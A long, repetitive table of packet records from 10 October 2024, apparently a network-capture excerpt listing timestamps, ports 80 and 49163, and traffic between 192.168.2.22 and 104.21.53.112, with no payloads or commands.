                      Oct 10, 2024 09:40:28.927336931 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927354097 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927364111 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927375078 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927422047 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927422047 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927422047 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927556992 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927594900 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927632093 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927653074 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927664042 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927674055 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927684069 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927701950 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927711964 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927722931 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927732944 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927742958 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927752018 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927817106 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927817106 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927839041 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927848101 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927859068 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927870989 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927882910 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927889109 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927913904 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927913904 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927925110 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.927953005 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927962065 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927972078 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.927989960 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928004980 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928061008 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928070068 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928081036 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928098917 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928117037 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928128958 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928138971 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928148985 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928158998 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928165913 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928174973 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928184032 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928196907 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928210974 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928232908 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928242922 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928251982 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928261995 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928270102 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928278923 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928286076 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928302050 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928317070 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928325891 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928333044 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928343058 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928350925 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928365946 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928376913 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928435087 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928445101 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928456068 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928466082 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928476095 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928483009 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928488016 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928498983 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928505898 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928517103 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928535938 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928539991 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928569078 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928658009 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928677082 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928684950 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928690910 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928704977 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928719997 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928730965 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928740025 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928759098 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928770065 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928778887 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928792953 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928805113 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928809881 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928834915 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928842068 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928852081 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928872108 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928877115 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928884983 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928894043 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928901911 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928915977 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.928968906 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928977966 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928988934 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.928997040 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929003000 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929016113 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929020882 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929028988 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929039001 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929044962 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929054022 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929069042 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929080963 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929091930 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929101944 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929111958 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929127932 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929141045 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929189920 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929199934 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929210901 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929219007 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929228067 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929234028 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929244041 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929250002 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929260969 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929272890 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929335117 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929343939 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929353952 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929363966 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929371119 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929380894 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929387093 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929395914 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929404020 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929413080 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929419994 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929426908 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929435968 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929450989 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929455042 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929470062 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929480076 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929486990 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929497004 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929502964 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929517984 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929526091 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929532051 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929538965 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929553986 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929568052 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929606915 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929616928 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929626942 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929637909 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929644108 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929652929 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929660082 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929667950 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929676056 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929689884 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929703951 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929737091 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929744959 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929754972 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929769039 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929774046 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929784060 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929790020 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929799080 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929814100 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929822922 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929832935 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929842949 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929860115 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929873943 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929902077 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929909945 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929919958 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929930925 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929936886 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929950953 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929960012 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929965973 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.929974079 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.929990053 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.930005074 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.930043936 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.930052996 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.930063963 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.930074930 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.930082083 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.930094957 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.930099010 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.930109024 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.930114985 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.930124044 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.930146933 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.930162907 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.930172920 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.930183887 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.930193901 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.930198908 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:28.930212975 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.930227995 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.932348013 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:28.932622910 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015302896 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015324116 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015340090 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015347958 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015356064 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015364885 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015378952 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015407085 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015450954 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015466928 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015480995 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015492916 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015495062 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015512943 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015537024 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015537024 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015537024 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015548944 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015563011 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015575886 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015594006 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015608072 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015614033 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015623093 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015624046 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015636921 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015636921 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015652895 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015652895 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015667915 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015671015 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015682936 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015685081 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015697002 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015708923 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015736103 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015750885 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015782118 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015794039 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015808105 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015821934 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015836000 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015846014 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015851974 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015856981 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015865088 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015870094 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015880108 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015883923 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015893936 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015894890 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015907049 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015908957 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015923977 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015927076 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015938997 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015938997 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.015950918 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.015965939 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016012907 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016027927 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016041040 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016051054 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016055107 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016062975 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016069889 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016073942 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016082048 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016087055 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016096115 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016098976 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016109943 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016112089 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016124964 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016138077 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016154051 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016168118 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016181946 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016194105 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016202927 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016215086 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016216040 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016227007 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016230106 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016239882 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016243935 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016258001 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016263008 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016273022 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016277075 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016288042 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016288996 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016300917 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016314030 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016355991 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016369104 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016405106 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016406059 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016421080 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016434908 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016449928 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016457081 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016463995 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016469955 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016482115 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016494036 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016544104 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016558886 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016573906 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016586065 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016594887 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016604900 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016617060 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016685963 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016700029 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016714096 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016721964 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016726971 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016733885 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016741991 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016746998 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016756058 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016762018 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016769886 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016771078 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016782999 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016782999 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016798019 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016804934 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016813040 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016828060 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016840935 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016840935 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016858101 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016901016 CEST4916380192.168.2.22104.21.53.112
                      Oct 10, 2024 09:40:29.016936064 CEST8049163104.21.53.112192.168.2.22
                      Oct 10, 2024 09:40:29.016949892 CEST8049163104.21.53.112192.168.2.22
